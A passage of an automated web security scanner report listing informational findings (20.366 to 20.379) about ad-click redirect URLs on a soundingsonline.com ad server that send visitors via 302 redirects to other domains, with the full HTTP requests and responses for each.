  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/277699116/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/277699116/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:51:16 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

20.366. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/281105801/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/281105801/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/281105801/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/281105801/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:50:15 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.367. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/281847158/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/281847158/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/281847158/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/281847158/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:39:59 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.368. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/285317148/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/285317148/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/285317148/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/285317148/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:40:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.369. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/287333455/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/287333455/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/287333455/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.flashedition.com/publication?i=59172

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/287333455/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:40:47 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.flashedition.com/publication?i=59172
Content-Length: 324
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.flashedition.com/publication?i=59172">here</a>
...[SNIP]...

20.370. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/288726570/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/288726570/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/288726570/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/288726570/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:59:53 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.371. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/298788808/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/298788808/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/298788808/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/298788808/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:46:33 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.372. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/300000781/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/300000781/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/300000781/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/300000781/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:49:24 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.373. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/301024327/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/301024327/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/301024327/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/301024327/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:40:28 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.374. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/307086521/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/307086521/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/307086521/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/307086521/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:50:00 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

20.375. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/311306263/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/311306263/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/311306263/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/311306263/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:01:15 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.376. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/312414512/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/312414512/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/312414512/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/312414512/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:25:42 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.377. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/312913212/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/312913212/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/312913212/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/312913212/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:10:54 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.378. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/317209443/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/317209443/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/317209443/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/317209443/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:47:51 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

20.379. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/318047660/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/318047660/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/318047660/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/318047660/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
